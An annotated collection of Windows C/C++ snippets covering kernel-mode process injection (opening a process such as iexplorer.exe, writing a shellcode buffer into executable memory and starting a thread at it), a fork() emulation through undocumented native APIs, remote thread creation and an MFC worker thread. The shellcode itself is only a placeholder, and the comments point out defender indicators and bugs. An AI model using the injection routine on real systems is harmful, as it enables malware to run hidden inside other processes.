unsigned char shellcode[1024*4]={...}// a ring-3 (user-mode) shellcode; the author leaves its contents to the imagination (e.g. a URL downloader). The `{...}` is a placeholder, not valid C: the payload bytes are not on this page. sizeof(shellcode) == 4096 is what WriteShellToProcess copies.
// Kernel-mode (driver) routine: builds a minimal user-mode stack and a hand-made
// 32-bit x86 CONTEXT inside hProcess, then creates a thread there with
// ZwCreateThread. Only Zw*/Ex* kernel exports and the undocumented USER_STACK /
// CLIENT_ID layouts are used.
//   hProcess      - target process handle, opened by the caller.
//   EntryPoint    - user-mode address the new thread starts at (context.Eip).
//   RegEax/RegEbx - initial EAX / EBX of the new thread.
// Returns the new thread handle, or NULL if any step fails.
// Defender view: the thread this creates should still be visible to kernel
// thread-creation callbacks (PsSetCreateThreadNotifyRoutine) and has a start
// address outside any loaded image; creating it from kernel mode does not
// remove those artifacts.
HANDLE CreateUserThread(
IN HANDLE hProcess,
IN PVOID EntryPoint,
IN ULONG RegEax,
IN ULONG RegEbx
)
{
USER_STACK stack = {0};
CONTEXT context;
NTSTATUS status;
// Two pages are reserved for the whole stack region.
ULONG AllocSize = PAGE_SIZE * 2;
PVOID p;
ULONG OldProtect;
HANDLE hThread = (HANDLE)0;
PCLIENT_ID cid;
// Reserve only; the chosen base is returned in stack.ExpandableStackBottom.
status = ZwAllocateVirtualMemory(hProcess,
&stack.ExpandableStackBottom,
0,
&AllocSize,
MEM_RESERVE,
PAGE_READWRITE);
if (NT_SUCCESS(status))
{
// Base is one page above Bottom; Limit is set equal to Base.
stack.ExpandableStackBase = (PUCHAR)stack.ExpandableStackBottom + PAGE_SIZE;
stack.ExpandableStackLimit = stack.ExpandableStackBase;
AllocSize = PAGE_SIZE;
// p = Base - PAGE_SIZE, i.e. p == ExpandableStackBottom: the one committed
// page is the bottom page of the reservation.
p = (PCHAR)stack.ExpandableStackBase - AllocSize;
status = ZwAllocateVirtualMemory(hProcess,
&p,
0,
&AllocSize,
MEM_COMMIT,
PAGE_READWRITE);
if (NT_SUCCESS(status))
{
AllocSize = PAGE_SIZE;
// That same committed page is then marked PAGE_GUARD; the initial ESP
// chosen below (Base - 4) lies inside it.
status = ZwProtectVirtualMemory(hProcess,
&p,
&AllocSize,
PAGE_READWRITE | PAGE_GUARD,
&OldProtect);
if (NT_SUCCESS(status))
{
// Receives the new thread's ids; used without a NULL check and freed
// below regardless of what ZwCreateThread returns, so the ids are discarded.
cid = ExAllocatePool(PagedPool, sizeof(CLIENT_ID));
// Hand-built flat 32-bit context: hard-coded segment selectors and
// EFlags = 0x3000 (only bits 12-13, the IOPL field). These constants are
// tied to a specific 32-bit Windows build; the kernel presumably
// sanitizes them when the thread first runs - confirm per target.
context.ContextFlags = CONTEXT_FULL;
context.SegCs = 0x18;
context.SegFs = 0x38;
context.SegEs = 0x20;
context.SegDs = 0x20;
context.SegSs = 0x20;
context.SegGs = 0x00;
context.EFlags = 0x3000;
// ESP 4 bytes below the stack top; EIP = caller-supplied entry point.
context.Esp = (ULONG)stack.ExpandableStackBase - 4;
context.Eip = (ULONG)EntryPoint;
context.Eax = RegEax;
context.Ebx = RegEbx;
// Last argument FALSE: not created suspended, the thread runs immediately.
status = ZwCreateThread(&hThread,
THREAD_ALL_ACCESS,
NULL,
hProcess,
cid,
&context,
&stack,
FALSE);
ExFreePool(cid);
if (NT_SUCCESS(status)) return hThread;
}
// Failure path: MEM_RELEASE with size 0 on p (== the reservation base)
// releases the whole region.
AllocSize = 0;
ZwFreeVirtualMemory(hProcess,
&p,
&AllocSize,
MEM_RELEASE);
}
// NOTE(review): MEM_DECOMMIT does not free a reservation, so on the path
// where only the reserve succeeded the region stays reserved - verify.
AllocSize = PAGE_SIZE * 2;
ZwFreeVirtualMemory(hProcess,
&stack.ExpandableStackBottom,
&AllocSize,
MEM_DECOMMIT);
return NULL;
}
// Kernel-mode routine: looks a process up by image name, opens it with full
// access, allocates a writable+executable region in it, copies the shellcode
// buffer there and starts a thread at that address via CreateUserThread.
// Returns the thread handle or NULL. hProcess and the RWX allocation are not
// released on any path; getprocessptr (not on this page) is assumed to fill
// pid and its result is not checked.
// Defender view: a thread whose start address lies in a private
// PAGE_EXECUTE_READWRITE region not backed by an image is the textbook
// process-injection indicator that memory scanners and thread-creation
// telemetry key on; doing the writes from kernel mode leaves the same artifacts.
HANDLE WriteShellToProcess()
{
HANDLE hProcess;
DWORD pid;
CLIENT_ID ClientId;
NTSTATUS stat;
OBJECT_ATTRIBUTES obj;
PVOID EntryPoint=0;
// Ten pages are committed for a 4 KiB buffer (sizeof(shellcode)).
ULONG AllocSize = PAGE_SIZE * 10;
// pid stays uninitialized if the lookup does not write it.
getprocessptr(0,L"iexplorer.exe",&pid);
ClientId.UniqueProcess = (HANDLE)pid;
ClientId.UniqueThread = 0;
InitializeObjectAttributes(&obj,
NULL,
OBJ_CASE_INSENSITIVE,
NULL,
NULL);
// Open by CLIENT_ID with PROCESS_ALL_ACCESS.
stat = ZwOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&obj,&ClientId);
if(NT_SUCCESS(stat))
{
// MEM_COMMIT with a NULL base: reserve + commit at a kernel-chosen address,
// writable and executable at once.
stat = ZwAllocateVirtualMemory(hProcess,
&EntryPoint,
0,
&AllocSize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if(NT_SUCCESS(stat))
{
// Whole buffer copied; trailing 0 = bytes-written count not requested.
stat = ZwWriteVirtualMemory(hProcess, EntryPoint, shellcode, sizeof(shellcode), 0);
if(NT_SUCCESS(stat))
{
// New thread starts at the copied buffer with EAX = EBX = 0.
return CreateUserThread(hProcess,EntryPoint,0,0);
}
}
}
return NULL;
}
#include "ntdll.h"
#include <stdio.h>
// Prototype for an undocumented ntdll export, reconstructed by the author (the
// second parameter is left unnamed). The message layout, opcode and size that
// InformCsrss passes through it belong to one particular Windows version and
// have to be revalidated for every other build.
namespace NT {
extern "C" {
NTSTATUS
NTAPI
CsrClientCallServer(
IN PVOID Message,
IN PVOID,
IN ULONG Opcode,
IN ULONG Size
);
}
}
// Marks every handle owned by the current process as inheritable, so the
// process that fork() creates with InheritHandles == TRUE receives copies of
// all of them.
// The system-wide handle list is fetched via SystemHandleInformation, doubling
// the buffer while the call reports STATUS_INFO_LENGTH_MISMATCH. Any other
// failure status also ends the loop, and the buffer is then read as if it held
// valid data. Return values of SetHandleInformation are ignored.
VOID InheritAll()
{
// n counts ULONGs; n * sizeof *p is the byte size handed to the query.
ULONG n = 0x1000;
PULONG p = new ULONG[n];
while (NT::ZwQuerySystemInformation(NT::SystemHandleInformation, p, n * sizeof *p, 0)
== STATUS_INFO_LENGTH_MISMATCH)
// Comma expression as loop body: free the old buffer, allocate twice as many.
delete [] p, p = new ULONG[n *= 2];
// p[0] is taken as the entry count; the entries themselves start at p + 1.
NT::PSYSTEM_HANDLE_INFORMATION h = NT::PSYSTEM_HANDLE_INFORMATION(p + 1);
ULONG pid = GetCurrentProcessId();
for (ULONG i = 0; i < *p; i++)
// Only entries belonging to this process; HANDLE_FLAG_INHERIT is used as both
// mask and value, so the flag is set on each of them.
if (h[i].ProcessId == pid)
SetHandleInformation(HANDLE(h[i].Handle), HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);
delete [] p;
}
// Registers the process/thread pair that ZwCreateProcess/ZwCreateThread made
// behind CSRSS's back - the notification CreateProcess normally sends - so the
// Win32 subsystem knows about the child.
// Everything here is private protocol: CSRSS_MESSAGE is the author's
// reconstruction, and opcode 0x10000 / size 0x24 are hard-coded for one
// Windows version (presumably the Base server's process-creation API; confirm
// against the target build before relying on it).
VOID InformCsrss(HANDLE hProcess, HANDLE hThread, ULONG pid, ULONG tid)
{
struct CSRSS_MESSAGE {
ULONG Unknown1;
ULONG Opcode;
ULONG Status;
ULONG Unknown2;
};
struct {
NT::PORT_MESSAGE PortMessage;
CSRSS_MESSAGE CsrssMessage;
PROCESS_INFORMATION ProcessInformation;
NT::CLIENT_ID Debugger;
ULONG CreationFlags;
ULONG VdmInfo[2];
// {hProcess, hThread, pid, tid} fills PROCESS_INFORMATION in declaration
// order; the debugger CLIENT_ID, creation flags and VDM info stay zero.
} csrmsg = {{0}, {0}, {hProcess, hThread, pid, tid}, {0}, 0, {0}};
// Second argument 0: no capture buffer, the message carries no pointers.
NT::CsrClientCallServer(&csrmsg, 0, 0x10000, 0x24);
}
// First thing the cloned (child) process runs. Its CONTEXT is the parent's,
// captured inside fork() with only EIP changed to this function, so ESP/EBP
// still describe fork()'s frame. After reconnecting the child to CSRSS it sets
// EAX = 0 and unwinds fork()'s frame itself, which makes fork() appear to
// return 0 in the child. __declspec(naked): no prologue/epilogue is emitted;
// the inline asm is the whole epilogue and relies on the frame pointer being
// kept (see the #pragma optimize("y", off) that follows this function).
__declspec(naked) int child()
{
// Author's name for the internal kernel32 routine that connects a fresh
// process to CSRSS (presumably); takes the subsystem port name.
typedef BOOL (WINAPI *CsrpConnectToServer)(PWSTR);
// Absolute addresses for three different Windows builds, two commented out.
// Valid for exactly one build; breaks on any other build or with ASLR.
// CsrpConnectToServer(0x77F68CC0)(L"\\Windows");
// CsrpConnectToServer(0x77F8F65D)(L"\\Windows");
CsrpConnectToServer(0x77F922F5)(L"\\Windows");
// Return value 0, then pop fork()'s frame and return into fork()'s caller.
__asm mov eax, 0
__asm mov esp, ebp
__asm pop ebp
__asm ret
}
#pragma optimize("y", off) // disable frame pointer omission
// Unix-style fork emulation on Windows through undocumented native calls:
// clones the current process's address space, creates a thread in the clone
// with a copy of this thread's context, and hands the pair to CSRSS.
// Returns the child's PID in the parent; in the child, child() unwinds this
// frame and the call appears to return 0. No status is checked anywhere.
int fork()
{
HANDLE hProcess, hThread;
InheritAll();
// Only Length is set: no name, no attributes.
NT::OBJECT_ATTRIBUTES oa = {sizeof oa};
// NULL section + NtCurrentProcess() as parent: per the native API's clone
// behaviour the new process gets a copy of the caller's address space.
// InheritHandles TRUE is what InheritAll() above prepared for.
NT::ZwCreateProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, NtCurrentProcess(), TRUE, 0, 0, 0);
// Snapshot this thread's full context; only EIP is redirected, to child().
NT::CONTEXT context = {CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS | CONTEXT_FLOATING_POINT};
NT::ZwGetContextThread(NtCurrentThread(), &context);
context.Eip = ULONG(child);
// Describe the region that currently holds ESP so the new thread's stack
// maps onto the same addresses in the clone.
MEMORY_BASIC_INFORMATION mbi;
NT::ZwQueryVirtualMemory(NtCurrentProcess(), PVOID(context.Esp),
NT::MemoryBasicInformation, &mbi, sizeof mbi, 0);
// Fixed-stack fields zero; expandable base = top of the region, limit =
// region base, bottom = allocation base (field order presumably
// FixedStackBase, FixedStackLimit, ExpandableStackBase,
// ExpandableStackLimit, ExpandableStackBottom - confirm against NT::USER_STACK).
NT::USER_STACK stack = {0, 0, PCHAR(mbi.BaseAddress) + mbi.RegionSize,
mbi.BaseAddress, mbi.AllocationBase};
NT::CLIENT_ID cid;
// Created suspended (TRUE) so the TEB fix-up and the CSRSS notification
// below happen before the child runs.
NT::ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &oa,
hProcess, &cid, &context, &stack, TRUE);
NT::THREAD_BASIC_INFORMATION tbi;
NT::ZwQueryInformationThread(NtCurrentThread(), NT::ThreadBasicInformation,
&tbi, sizeof tbi, 0);
NT::PNT_TIB tib = tbi.TebBaseAddress;
NT::ZwQueryInformationThread(hThread, NT::ThreadBasicInformation, &tbi, sizeof tbi, 0);
// The only TEB field copied into the child is this thread's ExceptionList.
NT::ZwWriteVirtualMemory(hProcess, tbi.TebBaseAddress,
&tib->ExceptionList, sizeof tib->ExceptionList, 0);
InformCsrss(hProcess, hThread, ULONG(cid.UniqueProcess), ULONG(cid.UniqueThread));
NT::ZwResumeThread(hThread, 0);
NT::ZwClose(hThread);
NT::ZwClose(hProcess);
// Parent's return value; the child returns 0 via child().
return int(cid.UniqueProcess);
}
#pragma optimize("", on)
// Demo driver for fork(): both processes beep and print the value fork()
// returned - the child's PID in the parent, expected to be 0 in the child (see
// child()). Sleep(pid * 10) just staggers the two outputs.
int main()
{
    const int pid = fork();
    Sleep(pid * 10);
    Beep(100, 100);
    printf("%d\n", pid);
    return 0;
}
// User-mode fragment (Win32 OpenProcess/GetCurrentThread plus ntdll Zw*
// exports) that prepares a 1 MiB expandable stack inside another process and
// creates a suspended thread there at `startaddress`. `hThread`, `startaddress`
// and `dwpid` are declared outside this fragment. Every status is written to
// `ret`, and only the last one is inspected.
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,0,dwpid);// dwpid is the PID of some system process
USER_STACK stack = {0};
DWORD ret;
ULONG n = 1024*1024;// 1 MiB
// Reserve the whole stack; the base comes back in ExpandableStackBottom.
ret=ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,MEM_RESERVE, PAGE_READWRITE);
// Stack top is 1 MiB above the bottom; Limit one page below the top.
stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom) +1024*1024;
stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase) - 4096;
// Commit two pages directly below the top (4096 + PAGE_SIZE bytes).
n = 4096 + PAGE_SIZE;
PVOID p = PCHAR(stack.ExpandableStackBase) - n;
ret=ZwAllocateVirtualMemory(hProcess, &p, 0, &n, MEM_COMMIT, PAGE_READWRITE);
// The lower of the two committed pages becomes the guard page; x receives
// the previous protection.
ULONG x; n = PAGE_SIZE;
ret=ZwProtectVirtualMemory(hProcess, &p, &n, PAGE_READWRITE | PAGE_GUARD, &x);
// Start from this thread's own context (segment registers and flags), then
// place ESP 2 KiB below the top - inside the upper, non-guard committed page.
CONTEXT context = {CONTEXT_FULL};
ret=ZwGetContextThread(GetCurrentThread(),&context);
context.Esp = ULONG(stack.ExpandableStackBase) - 2048;
// Entry point supplied outside this fragment.
context.Eip = ULONG(startaddress);
CLIENT_ID cid;
// Created suspended (TRUE); resuming it is not part of this fragment.
ret=ZwCreateThread(&hThread, THREAD_ALL_ACCESS, 0, hProcess, &cid, &context, &stack, TRUE);
// Any non-zero NTSTATUS (warnings included) is reported as a failure.
if(ret) MessageBox(0,"ZwCreateThread","",0);
// MFC worker-thread entry point. pParam must be a live CMyObject; a null or
// wrong-typed argument is rejected with exit code 1 before it is touched,
// otherwise the work runs and the thread exits with 0.
UINT MyThreadProc( LPVOID pParam )
{
    CMyObject* target = static_cast<CMyObject*>(pParam);
    const bool usable = target != NULL && target->IsKindOf(RUNTIME_CLASS(CMyObject));
    if (!usable)
        return 1; // invalid or wrong-typed argument
    // do something with 'target'
    return 0; // thread completed successfully
}
// inside a different function in the program
.
.
.
// The worker receives pNewObject as its raw LPVOID argument. Nothing on this
// page deletes it, so ownership of the CMyObject has to be settled between the
// caller and MyThreadProc (typically the worker frees it when it is done).
pNewObject = new CMyObject;
AfxBeginThread(MyThreadProc, pNewObject);
.
.
.